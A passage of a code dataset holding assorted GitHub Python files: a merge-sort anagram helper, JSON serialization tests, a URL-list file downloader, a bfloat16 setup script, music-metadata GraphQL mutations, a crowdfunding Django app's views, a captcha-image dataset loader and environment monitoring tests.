True)\n\n\ndef merge_sort(each_string, start=0, end=None):\n if end is None:\n end = len(each_string)\n if (end - start) > 1:\n mid = (start + end) // 2\n merge_sort(each_string, start, mid)\n merge_sort(each_string, mid, end)\n merge(each_string, start, mid, end)\n return each_string\n\n\ndef merge(each_string, start, mid, end):\n left = each_string[start:mid]\n right = each_string[mid:end]\n\n left_index, right_index = 0, 0\n\n for general_index in range(start, end):\n if left_index >= len(left):\n each_string[general_index] = right[right_index]\n right_index = right_index + 1\n elif right_index >= len(right):\n each_string[general_index] = left[left_index]\n left_index = left_index + 1\n elif left[left_index] < right[right_index]:\n each_string[general_index] = left[left_index]\n left_index = left_index + 1\n else:\n each_string[general_index] = right[right_index]\n right_index = right_index + 1\n\n return each_string\n","repo_name":"ioott/BackEnd-Python-Complexidade-Recursividade-Modelos-de-Algoritmos-de-Busca_e_Ordenacao","sub_path":"challenges/challenge_anagrams.py","file_name":"challenge_anagrams.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"1186198329","text":"\"\"\"Unit tests for the j_classify package.\"\"\"\n\nimport json\nimport unittest\nimport tempfile\n\nimport j_classify\n\n\nclass TestJObject(unittest.TestCase):\n \"\"\"Test the j_object package.\"\"\"\n\n def setUp(self) -> None:\n \"\"\"Set up the test case.\"\"\"\n # Create a temp folder to store the test files\n self.temp_folder = tempfile.TemporaryDirectory()\n return super().setUp()\n\n def tearDown(self) -> None:\n \"\"\"Tear down the test case.\"\"\"\n # Delete the temp folder\n self.temp_folder.cleanup()\n return super().tearDown()\n\n def test_load_j_object(self) -> None:\n \"\"\"Test the load_j_object function.\"\"\"\n class test_class_1(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_1\"\n self.number = 1\n self.boolean = True\n self.children: list = []\n\n class test_class_2(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_2\"\n self.number = 2\n self.boolean = False\n self.children: list = []\n\n class test_class_3(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_3\"\n self.number = 3\n self.boolean = True\n\n obj_1 = test_class_1()\n obj_1.name = \"obj_1\"\n obj_1.number = 2\n obj_1.boolean = False\n obj_2 = test_class_2()\n obj_2.name = \"obj_2\"\n obj_2.number = 3\n obj_2.boolean = True\n obj_1.children.append(obj_2)\n obj_3 = test_class_3()\n obj_3.name = \"obj_3\"\n obj_3.number = 4\n obj_3.boolean = False\n obj_2.children.append(obj_3)\n\n # Save the object to a file\n file_path = self.temp_folder.name + \"/test_load_j_object.json\"\n with open(file_path, \"w\") as file:\n json.dump(obj_1, file, cls=j_classify.j_object_encoder)\n\n # Load the object from the file\n with open(file_path, \"r\") as file:\n # Load a json dictionary of the file contents\n json_data = json.loads(file.read())\n loaded_obj_1 = json.loads(json.dumps(json_data), object_hook=j_classify.load_j_object)\n\n # Check the loaded object\n self.assertTrue(isinstance(loaded_obj_1, test_class_1), f\"loaded_obj_1 is not a test_class_1, it is a {loaded_obj_1.__class__.__name__}\")\n self.assertEqual(loaded_obj_1.name, \"obj_1\", \"loaded_obj_1.name is not 'obj_1'\")\n self.assertEqual(loaded_obj_1.number, 2, \"loaded_obj_1.number is not 2\")\n self.assertEqual(loaded_obj_1.boolean, False, \"loaded_obj_1.boolean is not False\")\n self.assertEqual(len(loaded_obj_1.children), 1, \"loaded_obj_1.children does not have 1 item\")\n self.assertTrue(isinstance(loaded_obj_1.children[0], test_class_2),\n f\"loaded_obj_1.children[0] is not a test_class_2, it is a {loaded_obj_1.children[0].__class__.__name__}\")\n self.assertEqual(loaded_obj_1.children[0].name, \"obj_2\", \"loaded_obj_1.children[0].name is not 'obj_2'\")\n self.assertEqual(loaded_obj_1.children[0].number, 3, \"loaded_obj_1.children[0].number is not 3\")\n self.assertEqual(loaded_obj_1.children[0].boolean, True, \"loaded_obj_1.children[0].boolean is not True\")\n self.assertEqual(len(loaded_obj_1.children[0].children), 1,\n \"loaded_obj_1.children[0].children does not have 1 item\")\n self.assertTrue(isinstance(loaded_obj_1.children[0].children[0], test_class_3),\n \"loaded_obj_1.children[0].children[0] is not a test_class_3\")\n self.assertEqual(loaded_obj_1.children[0].children[0].name, \"obj_3\",\n \"loaded_obj_1.children[0].children[0].name is not 'obj_3'\")\n self.assertEqual(loaded_obj_1.children[0].children[0].number, 4,\n \"loaded_obj_1.children[0].children[0].number is not 4\")\n self.assertEqual(loaded_obj_1.children[0].children[0].boolean, False,\n \"loaded_obj_1.children[0].children[0].boolean is not False\")\n\n def test_list_all_j_objects(self) -> None:\n \"\"\"Test the list_all_j_objects function.\"\"\"\n class test_class_1(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_1\"\n self.number = 1\n self.boolean = True\n self.children: list = []\n\n class test_class_2(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_2\"\n self.number = 2\n self.boolean = False\n self.children: list = []\n\n class test_class_3(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_3\"\n self.number = 3\n self.boolean = True\n\n j_objects = j_classify.list_all_j_objects()\n self.assertTrue(isinstance(j_objects, dict), \"j_objects is not a dict\")\n self.assertEqual(len(j_objects), 3, \"j_objects does not have 3 items\")\n self.assertTrue(\"test_class_1\" in j_objects, \"test_class_1 is not in j_objects\")\n self.assertTrue(\"test_class_2\" in j_objects, \"test_class_2 is not in j_objects\")\n self.assertTrue(\"test_class_3\" in j_objects, \"test_class_3 is not in j_objects\")\n\n def test_j_object(self) -> None:\n \"\"\"Test the j_object class.\"\"\"\n class test_class_1(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_1\"\n self.number = 1\n self.boolean = True\n self.children: list = []\n\n class test_class_2(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_2\"\n self.number = 2\n self.boolean = False\n self.children: list = []\n\n class test_class_3(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_3\"\n self.number = 3\n self.boolean = True\n\n obj_1 = test_class_1()\n obj_2 = test_class_2()\n obj_3 = test_class_3()\n\n self.assertTrue(isinstance(obj_1, j_classify.j_object), \"obj_1 is not a j_object\")\n self.assertTrue(isinstance(obj_2, j_classify.j_object), \"obj_2 is not a j_object\")\n self.assertTrue(isinstance(obj_3, j_classify.j_object), \"obj_3 is not a j_object\")\n\n def test_j_object_encoder(self) -> None:\n \"\"\"Test the j_object_encoder class.\"\"\"\n class test_class_1(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_1\"\n self.number = 1\n self.boolean = True\n self.children: list = []\n\n class test_class_2(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_2\"\n self.number = 2\n self.boolean = False\n self.children: list = []\n\n class test_class_3(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_3\"\n self.number = 3\n self.boolean = True\n\n obj_1 = test_class_1()\n obj_2 = test_class_2()\n obj_3 = test_class_3()\n\n self.assertTrue(isinstance(obj_1, j_classify.j_object), \"obj_1 is not a j_object\")\n self.assertTrue(isinstance(obj_2, j_classify.j_object), \"obj_2 is not a j_object\")\n self.assertTrue(isinstance(obj_3, j_classify.j_object), \"obj_3 is not a j_object\")\n\n obj_1.children.append(obj_2)\n obj_2.children.append(obj_3)\n\n obj_data = json.dumps(obj_1, cls=j_classify.j_object_encoder, indent=4)\n self.assertTrue(isinstance(obj_data, str), \"obj_data is not a string\")\n print(obj_data)\n","repo_name":"gabrieljreed/jObject","sub_path":"tests/test_j_classify.py","file_name":"test_j_classify.py","file_ext":"py","file_size_in_byte":8376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"34313435421","text":"# Web to extract links from a website : https://hackertarget.com/extract-links/\n# If the error \"urllib.error.URLError: <urlopen error\n# [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed:\n# self signed certificate in certificate chain (_ssl.c:1076)>\"\n# arises, please visit : https://stackoverflow.com/questions/27835619/urllib-and-ssl-certificate-verify-failed-error\n# and install the recommended packages\n\nfrom pathlib import Path as pt\nimport urllib.request\n\n\ndef folder_creator(direction):\n # creates a folder in the given direction folder\n direction.mkdir(exist_ok=False)\n\n\ndef data_obteiner(url, cut_world):\n\n # tool to find the names of the directory and the subdiretories where the file will be store\n #\n # Args : the original url and the world starting on which (included) we will create our directories\n # (for instance if the tree is ./me/name/is/xx.pdf and the cut world is me, the class\n # will create name/is directories)\n #\n # Return :\n # direction : the tree as an array of the directories to be created\n # file_name : the name of the file to be stored\n\n url_name_clean = url.split(\"/\") # the urls as an array\n file_name = url_name_clean[len(url_name_clean) - 1].strip() # the name of the file\n\n for i in range(len(url_name_clean)):\n world = url_name_clean[i]\n\n if world == cut_world:\n direction = url_name_clean[i:len(url_name_clean) - 1] # the direction tree\n\n return direction, file_name\n\n\nclass DownloaderCreator:\n\n # Downloads the file and the creates the whole directory tree to store it\n # Args:\n # filename : the name of the .txt file where the urls are stored.\n # cut_world : the world starting on we will create our tree\n # store_directory : where the data will be stored (both directories and files\n\n def __init__(self, filename, cut_world, store_directory):\n self.filename = filename\n self.cut_world = cut_world\n self.store_directory = store_directory\n\n def download_save(self):\n\n files_txt = open(self.filename, mode=\"r\", encoding=\"utf-8\")\n # a list to store the already created files. If we try to create an existing directory an exception will arise.\n already_created = list()\n\n for file in files_txt:\n array = data_obteiner(file, self.cut_world)[0]\n file_name = data_obteiner(file, self.cut_world)[1]\n\n for el in range(len(array)):\n if array[el] not in already_created:\n already_created.append(array[el])\n final_path = self.store_directory / \"/\".join(array[0:el + 1])\n folder_creator(final_path)\n\n # to create the folder the first time (including last one)\n if array[el] and el == len(array) - 1:\n urllib.request.urlretrieve(file, str(final_path / file_name))\n\nname_of_file = \"THE NAME OF THE .TXT INCLUDING THE URLS\"\nname_of_directory = \"WHERE THEY ARE (STARTING FROM YOUR HOME DIRECTORY)\"\n\nwhere_data_is = pt.home() / name_of_directory / name_of_file\ncutWorld = \"courses\"\npath = pt.cwd() / \"Data\"\n\nif __name__ == \"__main__\":\n ob = DownloaderCreator(where_data_is, cutWorld, path)\n ob.download_save()\n\n","repo_name":"ruizeneko/File-Downloader","sub_path":"Downloader.py","file_name":"Downloader.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"38434943136","text":"import os\nimport sys\nimport shutil\nfrom distutils.command.build_ext import build_ext\n\nfrom setuptools import Extension, setup\n\n# from distutils.sysconfig import customize_compiler\n\nPACKAGE_NAME='bfloat16'\n\nimport numpy as np\n\nif 'clean' in sys.argv:\n curdir = os.path.dirname(os.path.realpath(__file__))\n for filepath in ['build', 'dist', f'{PACKAGE_NAME}.egg-info', 'MANIFEST']:\n if os.path.exists(filepath):\n if os.path.isfile(filepath):\n os.remove(filepath)\n else:\n shutil.rmtree(filepath)\n\n# class my_build_ext(build_ext):\n# def build_extensions(self):\n# customize_compiler(self.compiler)\n# try:\n# self.compiler.compiler_so.remove(\"-Wstrict-prototypes\")\n# except (AttributeError, ValueError):\n# pass\n# build_ext.build_extensions(self)\n\n\nmodule1 = Extension(PACKAGE_NAME,\n sources=['bfloat16.cc'],\n include_dirs=[np.get_include(), \"eigen/Eigen\"],\n extra_compile_args=['-std=c++11'])\n\nsetup(name=PACKAGE_NAME,\n version='1.4.0',\n description='Numpy bfloat16 package',\n requires=[\"numpy\"],\n py_modules=[],\n author='GreenWaves Technologies',\n author_email='support@greenwaves-technologies.com',\n url='https://github.com/GreenWaves-Technologies/bfloat16',\n download_url = 'https://github.com/GreenWaves-Technologies/bfloat16/archive/refs/tags/1.0.tar.gz',\n install_requires=[],\n ext_modules=[module1])\n# ,\n# cmdclass={'build_ext': my_build_ext})\n","repo_name":"GreenWaves-Technologies/bfloat16","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"92"} +{"seq_id":"11765925189","text":"from trompace.exceptions import UnsupportedLanguageException, NotAMimeTypeException\nfrom trompace.mutations.templates import format_mutation, format_link_mutation\nfrom trompace import StringConstant, _Neo4jDate, check_required_args, filter_none_args, docstring_interpolate\nfrom trompace.constants import SUPPORTED_LANGUAGES\n\n\nMUSICRECORDING_ARGS_DOCS = \"\"\"name: The name of the MusicRecording object.\n creator: The person, organization or service who created the thing the web resource is about.\n contributor: A person, an organization, or a service responsible for contributing the MusicRecording to the web resource. This can be either a name or a base URL.\n format_: A MimeType of the format of the page describing the MusicRecording.\n source: The URL of the web resource about this MusicRecording.\n title: The title of the resource indicated by `source`\n \"\"\"\n\n\n@docstring_interpolate(\"musicrecording_args\", MUSICRECORDING_ARGS_DOCS)\ndef mutation_create_musicrecording(*, name: str = None, title: str, description: str, contributor: str, creator: str, source: str,\n format_: str, encodingformat: str = None, subject: str = None, language: str = None, date: str = None):\n \"\"\"Returns a mutation for creating a MusicRecording object.\n https://schema.org/MusicRecording\n\n Arguments:\n {musicrecording_args}\n\n Returns:\n The string for the mutation for creating the MusicRecording.\n \"\"\"\n check_required_args(title=title, contributor=contributor, creator=creator, source=source, format_=format_)\n\n if \"/\" not in format_:\n raise NotAMimeTypeException(format_)\n\n if language is not None and language not in SUPPORTED_LANGUAGES:\n raise UnsupportedLanguageException(language)\n\n args = {\n \"name\": name,\n \"title\": title,\n \"description\": description,\n \"contributor\": contributor,\n \"creator\": creator,\n \"source\": source,\n \"format\": format_,\n \"encodingFormat\": encodingformat,\n \"subject\": subject\n }\n\n if language is not None:\n args[\"language\"] = StringConstant(language.lower())\n if date is not None:\n args[\"date\"] = _Neo4jDate(date)\n\n args = filter_none_args(args)\n\n return format_mutation(\"CreateMusicRecording\", args)\n\n\n@docstring_interpolate(\"musicrecording_args\", MUSICRECORDING_ARGS_DOCS)\ndef mutation_update_musicrecording(identifier: str, *, title: str = None, contributor: str = None,\n creator: str = None, source: str = None, encodingformat: str = None,\n format_: str = None, name: str = None, language: str = None,\n description: str = None, date: str = None, subject: str = None):\n \"\"\"Returns a mutation for updating a MusicRecording object.\n https://schema.org/MusicRecording\n\n Arguments:\n identifier: The identifier of the MusicRecording in the CE to be updated\n {musicrecording_args}\n\n Returns:\n The string for the mutation for updating the MusicRecording.\n \"\"\"\n if format_ is not None and \"/\" not in format_:\n raise NotAMimeTypeException(format_)\n\n if language is not None and language not in SUPPORTED_LANGUAGES:\n raise UnsupportedLanguageException(language)\n\n args = {\n \"identifier\": identifier,\n \"title\": title,\n \"contributor\": contributor,\n \"creator\": creator,\n \"source\": source,\n \"format\": format_,\n \"name\": name,\n \"description\": description,\n \"encodingFormat\": encodingformat,\n \"subject\": subject\n }\n\n if date is not None:\n args[\"date\"] = _Neo4jDate(date)\n if language is not None:\n args[\"language\"] = StringConstant(language.lower())\n\n args = filter_none_args(args)\n\n return format_mutation(\"UpdateMusicRecording\", args)\n\n\ndef mutation_delete_musicrecording(identifier: str):\n \"\"\"Returns a mutation for deleting a MusicRecording object based on the identifier.\n https://schema.org/MusicRecording\n\n Arguments:\n identifier: The unique identifier of the MusicRecording object.\n\n Returns:\n The string for the mutation for deleting the MusicRecording object based on the identifier.\n \"\"\"\n\n return format_mutation(\"DeleteMusicRecording\", {\"identifier\": identifier})\n\n\ndef mutation_merge_music_recording_audio(recording_identifier, audio_identifier):\n \"\"\"Returns a mutation for adding a Audio object to a MusicRecording object.\n (https://schema.org/workExample).\n\n Args:\n recording_identifier: The identifier of a MusicRecording.\n audio_identifier: The identifier of a AudioObject linked to a MusicRecording.\n\n Returns:\n The string for the mutation for adding a Audio object to a MusicRecording object.\n \"\"\"\n return format_link_mutation(\"MergeMusicRecordingAudio\", recording_identifier, audio_identifier)\n\n\ndef mutation_remove_music_recording_audio(recording_identifier, audio_identifier):\n \"\"\"Returns a mutation for removing a Audio object to a MusicRecording object.\n (https://schema.org/workExample).\n\n Args:\n recording_identifier: The identifier of a MusicRecording.\n audio_identifier: The identifier of a AudioObject linked to a MusicRecording.\n\n Returns:\n The string for the mutation for removing a Audio object to a MusicRecording object.\n \"\"\"\n return format_link_mutation(\"RemoveMusicRecordingAudio\", recording_identifier, audio_identifier)\n","repo_name":"trompamusic/trompace-client","sub_path":"trompace/mutations/musicrecording.py","file_name":"musicrecording.py","file_ext":"py","file_size_in_byte":5545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"13008595073","text":"# persistence(999) => 4 # Because 9*9*9 = 729, 7*2*9 = 126,\n# # 1*2*6 = 12, and finally 1*2 = 2.\n# persistence(39) => 3 # Because 3*9 = 27, 2*7 = 14, 1*4=4\n# # and 4 has only one digit.\n\ndef persistence(n):\n # print(type(n))\n nn=str(n)\n # print(type(nn))\n\n if len(nn) == 1:\n print(0)\n return 0\n \n else:\n\n arr_n=[]\n arr_n.append(nn)\n # print(arr_n)\n\n for i in arr_n:\n if len(i) != 1:\n x=[]\n sum=1\n for n1 in i:\n x.append(n1)\n\n for n2 in x:\n n2=int(n2)\n sum *= n2\n\n # print(sum)\n arr_n.append(str(sum))\n # print(arr_n)\n\n \n print(len(arr_n)-1)\n return len(arr_n)-1\n\n\npersistence(39), 3\npersistence(4), 0\npersistence(25), 2\npersistence(999), 4","repo_name":"jiarmy1125/Kata","sub_path":"Persistent Bugger.py","file_name":"Persistent Bugger.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"13997476564","text":"import json\nfrom math import floor\n\nfrom django.contrib.auth import get_user\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import Http404, HttpResponse\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views.decorators.http import require_http_methods\nfrom django.db.models import Sum\n\nfrom .models import \\\n Project, Donation, Category, Comment, CommentReports, ProjectImages,Tag\nfrom .forms import DonateForm, CreateForm\nfrom django.contrib import messages\nfrom django.shortcuts import redirect\nfrom collections import Counter\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .utils import get_total_donations, get_projects_donations, get_the_most_similar_projects\n\n\n@login_required()\ndef show(request, project_id):\n project = get_object_or_404(Project, id=project_id)\n\n is_project_canceled = project.status == -1 or False\n\n if is_project_canceled and project.owner_id != request.user.id:\n raise Http404(\"project was canceled\")\n\n comments = project.comment_set.all().order_by('-created_at')\n reported_comments = [\n _.comment for _ in get_user(request).commentreports_set.all()\n ]\n\n tags = [_.tag for _ in project.projecttags_set.all()]\n\n related_projects = get_the_most_similar_projects(project, tags)\n if len(related_projects) < 2:\n related_projects = project.category.project_set.all()\n total_donations = get_total_donations(project)\n\n total_likes = project.review_set.filter(liked=True).count()\n liked = get_user(request).review_set.filter(liked=True)\n favourites = [_.project for _ in liked]\n is_user_reported = project.review_set.filter(user_id=request.user.id)\n is_project_saved = project.savedproject_set.filter(user_id=request.user.id)\n review = get_user(request).review_set.filter(project_id=project_id).first()\n\n is_rated = False\n if review and review.rate:\n is_rated = True\n\n donation_form = DonateForm()\n\n context = {\n 'project': project,\n 'comments': comments,\n 'tags': tags,\n 'favourites': favourites,\n 'donation_form': donation_form,\n 'total_donations': total_donations,\n 'total_likes': total_likes,\n 'is_user_reported': is_user_reported,\n 'is_project_saved': is_project_saved,\n 'related_projects': related_projects,\n 'reported_comments': reported_comments,\n 'is_project_canceled': is_project_canceled,\n 'is_rated': is_rated,\n }\n return render(request, 'projects/show.html', context)\n\n\n@require_http_methods(\"POST\")\ndef donate(request, project_id):\n project = get_object_or_404(Project, id=project_id)\n project.donation_set.create(\n user=get_user(request),\n donation=int(request.POST.get('donation'))\n )\n messages.success(request, \"Donation Added Successfully\")\n return redirect('show_project', project_id)\n\n\n@require_http_methods(\"POST\")\ndef add_comment(request, project_id):\n new_comment = request.POST.get('comment')\n current_user = get_user(request)\n current_user.comment_set.create(\n project_id=project_id,\n comment=new_comment)\n return redirect('show_project', project_id)\n\n\n@require_http_methods(\"POST\")\ndef add_reply(request):\n comment = get_object_or_404(Comment, pk=request.POST.get('comment_id'))\n reply = request.POST.get('reply')\n current_user = get_user(request)\n current_user.reply_set.create(\n reply=reply,\n comment=comment\n )\n return redirect('show_project', comment.project.id)\n\n\n@require_http_methods(\"POST\")\ndef delete_comment(request):\n comment = get_object_or_404(Comment, pk=request.POST.get('comment_id'))\n project_id = comment.project_id\n comment.delete()\n return redirect('show_project', project_id)\n\n\n@require_http_methods(\"POST\")\ndef report_comment(request):\n comment = get_object_or_404(Comment, pk=request.POST.get('comment_id'))\n CommentReports.objects.create(\n comment=comment,\n user=get_user(request),\n )\n return redirect('show_project', comment.project.id)\n\n\n@require_http_methods(\"POST\")\ndef change_favourites(request):\n project_id = request.POST.get('project')\n review = get_user(request).review_set.filter(\n project_id=project_id\n ).first()\n\n if review:\n review.liked = not review.liked\n review.save()\n else:\n review = get_user(request).review_set.create(\n project_id=project_id,\n liked=True\n )\n\n if review.liked:\n message = \"You have Successfully added\" \\\n \" this project to your favourites\"\n else:\n message = \"You have Successfully deleted\" \\\n \" this project from your favourites\"\n\n return HttpResponse(message)\n\n\n@require_http_methods(\"POST\")\ndef add_rate(request):\n project_id = request.POST.get('project')\n review, created = get_user(request).review_set.get_or_create(\n project_id=project_id\n )\n\n review.rate = int(request.POST.get('rate'))\n review.save()\n message = \"Thanks, for taking time to rate this project.\"\n return HttpResponse(message)\n\n\n@require_http_methods(\"POST\")\ndef report(request, project_id):\n get_user(request).review_set.get_or_create(\n reported=True,\n project_id=project_id\n )\n messages.success(request, \"Report Added Successfully\")\n return redirect('show_project', project_id)\n\n\n@require_http_methods(\"POST\")\ndef save(request, project_id):\n project = get_object_or_404(Project, id=project_id)\n if project.savedproject_set.get_or_create(user_id=request.user.id)[1]:\n messages.success(request, \"Project Saved Successfully\")\n else:\n project.savedproject_set.get(user_id=request.user.id).delete()\n messages.success(\n request,\n \"Project Removed From Your Saved Successfully\"\n )\n\n return redirect('show_project', project_id)\n\n\n@require_http_methods(\"POST\")\ndef cancel(request, project_id):\n project = get_object_or_404(Project, id=project_id)\n if get_total_donations(project)/project.target < .25:\n project.status = -1\n project.save()\n messages.success(\n request,\n \"The project has been canceled Successfully, we're sorry for that\"\n )\n\n else:\n messages.error(\n request,\n \"You can't cancel the project, \"\n \"the donations exceeded 25% of the target\"\n )\n return redirect('show_project', project_id)\n\n\ndef show_all(request):\n all_projects = Project.objects.all()\n donations, total_donations = get_projects_donations(all_projects)\n all_projects = pagination(request, all_projects)\n context = {\n \"donations\": donations,\n 'total_donations': total_donations,\n \"all_projects\": all_projects\n }\n return render(request, \"projects/all_projects.html\", context)\n\n\ndef show_create_project(request):\n categories = Category.objects.all()\n context = {'create_form': CreateForm, 'categories': categories}\n return render(request, 'projects/create_project.html', context)\n\n\ndef create(request):\n categories = Category.objects.all()\n if request.method == 'POST':\n create_form = CreateForm(request.POST, request.FILES)\n project_images = request.FILES.getlist('images')\n context = {'create_form': create_form, 'categories': categories}\n if create_form.is_valid():\n project = Project(\n title=create_form.cleaned_data['title'],\n details=create_form.cleaned_data['details'],\n target=create_form.cleaned_data['target'],\n cover=request.FILES['cover'],\n category_id=request.POST['categ'],\n start_date=create_form.cleaned_data['start_date'],\n end_date=create_form.cleaned_data['end_date'],\n owner_id=request.user.id\n )\n project.save()\n tags = create_form.cleaned_data['tags']\n tags = tags.split(',')\n for tag in tags:\n obj, created = Tag.objects.get_or_create(name=tag)\n project.projecttags_set.create(tag=obj)\n for image in project_images:\n photo = ProjectImages(project=project, image=image)\n photo.save()\n messages.success(request, 'Project Created Successfully')\n return redirect('show_project', project.id)\n else:\n return render(request, 'projects/create_project.html', context)\n\n\ndef projects_list(request):\n projects = get_user(request).project_set.all()\n context = get_context(request, projects)\n return render(request, 'projects/project_list.html', context)\n\n\ndef donate_list(request):\n my_donations = get_user(request).donation_set.order_by('-donated_at')\n projects = [_.project for _ in my_donations]\n context = get_context(request, projects)\n context['my_donations'] = my_donations\n return render(request, 'projects/donation_list.html', context)\n\n\ndef saved_projects(request):\n saved = get_user(request).savedproject_set.all()\n projects = [_.project for _ in saved]\n context = get_context(request, projects)\n return render(request, 'projects/project_list.html', context)\n\n\ndef pagination(request, projects):\n page = request.GET.get('page', 1)\n paginator = Paginator(projects, 18)\n try:\n projects = paginator.page(page)\n except PageNotAnInteger:\n projects = paginator.page(1)\n except EmptyPage:\n projects = paginator.page(paginator.num_pages)\n return projects\n\n\ndef get_context(request, projects):\n donations, total_donations = get_projects_donations(projects)\n projects = pagination(request, projects)\n context = {\n \"projects\": projects,\n \"donations\": donations,\n 'total_donations': total_donations\n }\n return context\n","repo_name":"Elshafeay/crowd-funding","sub_path":"projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74340807018","text":"import re\nimport torch\nfrom torch.utils.data import Dataset\nimport os\nfrom PIL import Image\nfrom torchvision import transforms\n\n\n\nclass MyDataset(Dataset):\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Resize((40, 100)),\n transforms.Grayscale()\n ])\n\n def __init__(self, image_path):\n image_path = 'Verification_code_identification\\\\source\\\\train_img'\n super(MyDataset, self).__init__()\n self.image_path = [os.path.join(image_path, file_name) for file_name in os.listdir(image_path)]\n\n def __len__(self):\n return len(self.image_path)\n\n def __getitem__(self, item):\n image = Image.open(self.image_path[item])\n image = MyDataset.transform(image)\n image_name = self.image_path[item].split('/')[-1]\n code = image_name.split('_')[0]\n code = MyDataset.encode(code) # 转换为展平的单热点编码tensor\n return image, code\n\n @staticmethod\n def encode(code):\n \"\"\"\n :param code:验证码\n :return: 展平后的单热点编码Tensor\n 使用单热点编码,便于神经网络输出\n \"\"\"\n all_code = list('0123456789')\n code = ''.join(re.findall(r'\\d', code))\n encoded = torch.zeros(len(code), len(all_code), dtype=torch.int)\n for i in range(len(code)):\n encoded[i, all_code.index(code[i])] = int(1)\n encoded = torch.flatten(encoded)\n return encoded\n\n @staticmethod\n def decode(code_tensor):\n all_code = list('0123456789')\n f = code_tensor.view(4, 10)\n result = []\n for row in f:\n result.append(all_code[torch.argmax(row, dim=0)])\n result = ''.join(result)\n return result\n\n","repo_name":"asunashama/Smart_inlay","sub_path":"source/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"40984941908","text":"\"\"\" Contains tests for the observation logging wrapper. \"\"\"\n\nimport numpy as np\n\nfrom maze.core.log_events.monitoring_events import ObservationEvents, RewardEvents, ActionEvents\nfrom maze.core.wrappers.log_stats_wrapper import LogStatsWrapper\nfrom maze.core.wrappers.monitoring_wrapper import MazeEnvMonitoringWrapper\nfrom maze.test.shared_test_utils.dummy_env.dummy_core_env import DummyCoreEnvironment\nfrom maze.test.shared_test_utils.dummy_env.dummy_maze_env import DummyEnvironment\nfrom maze.test.shared_test_utils.dummy_env.dummy_struct_env import DummyStructuredEnvironment\nfrom maze.test.shared_test_utils.dummy_env.space_interfaces.action_conversion.dict import DictActionConversion\nfrom maze.test.shared_test_utils.dummy_env.space_interfaces.observation_conversion.dict import ObservationConversion\nfrom maze.test.shared_test_utils.helper_functions import build_dummy_maze_env\n\n\ndef build_dummy_structured_environment() -> DummyStructuredEnvironment:\n \"\"\"\n Instantiates the DummyStructuredEnvironment.\n\n :return: Instance of a DummyStructuredEnvironment\n \"\"\"\n\n observation_conversion = ObservationConversion()\n\n maze_env = DummyEnvironment(\n core_env=DummyCoreEnvironment(observation_conversion.space()),\n action_conversion=[DictActionConversion()],\n observation_conversion=[observation_conversion]\n )\n\n return DummyStructuredEnvironment(maze_env=maze_env)\n\n\ndef test_observation_monitoring():\n \"\"\" Observation logging unit test \"\"\"\n\n # instantiate env\n env = build_dummy_maze_env()\n\n env = MazeEnvMonitoringWrapper.wrap(env, observation_logging=True, action_logging=False, reward_logging=False)\n env = LogStatsWrapper.wrap(env) # for accessing events from previous steps\n env.reset()\n\n # test application of wrapper\n for ii in range(3):\n # Observation will get reported in the next step (when the agent is actually acting on it)\n obs = env.step(env.action_space.sample())[0]\n\n observation_events = env.get_last_step_events(query=[ObservationEvents.observation_original,\n ObservationEvents.observation_processed])\n assert len(observation_events) == 4\n for event in observation_events:\n assert issubclass(event.interface_class, ObservationEvents)\n obs_name = event.attributes['name']\n assert obs_name in ['observation_0', 'observation_1']\n if ii > 0:\n assert np.allclose(np.asarray(obs[obs_name]), np.asarray(event.attributes['value']))\n\n\ndef test_reward_monitoring():\n \"\"\" Reward logging unit test \"\"\"\n\n # instantiate env\n env = build_dummy_maze_env()\n\n env = MazeEnvMonitoringWrapper.wrap(env, observation_logging=False, action_logging=False, reward_logging=True)\n env = LogStatsWrapper.wrap(env) # for accessing events from previous steps\n env.reset()\n env.step(env.action_space.sample())\n\n # test application of wrapper\n for ii in range(2):\n env.step(env.action_space.sample())\n\n reward_events = env.get_last_step_events(query=[RewardEvents.reward_original,\n RewardEvents.reward_processed])\n\n assert len(reward_events) == 2\n for event in reward_events:\n assert issubclass(event.interface_class, RewardEvents)\n assert event.attributes['value'] == 10\n assert event.interface_method in [RewardEvents.reward_original, RewardEvents.reward_processed]\n\n\ndef test_action_monitoring():\n \"\"\" Action logging unit test \"\"\"\n\n # instantiate env\n env = build_dummy_maze_env()\n\n env = 